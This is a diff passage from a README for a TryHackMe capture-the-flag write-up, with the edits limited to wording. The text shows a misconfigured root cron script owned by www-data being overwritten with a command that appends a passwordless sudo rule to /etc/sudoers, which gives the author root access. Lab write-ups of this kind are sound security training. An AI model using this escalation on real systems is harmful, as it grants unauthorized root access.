tsumarios/CTF-Writeups/THM/ConvertMyVideo/README.md

 2020/11/21 17:32:01 CMD: UID=0    PID=1389   | /usr/sbin/CRON -f
 ```

 Yeah!
-Here is the proof that we have a misconfigured cron job as the `clean.sh` script is scheduled to run regularly as *root* (UID=0), but `www-data` (our current user) is the owner.
+Here is the proof that we have a misconfigured cron job, as the `clean.sh` script is scheduled to run regularly as *root* (UID=0), but `www-data` (our current user) is the owner.
 Thereby we can modify this script and elevate our privileges as follows:

 ```sh
 www-data@dmv:/var/www/html$ echo "echo 'www-data ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers" > clean.sh
 ```

-Now all we have to do is to wait for the next execution of the script and... voilà!
-Our user has finally **root permissions**:
+Eventually, all we have to do is to wait for the next execution of the script and... voilà!
+Our user finally got **root permissions**:

 ```sh
 www-data@dmv:/var/www/html$ sudo ls /root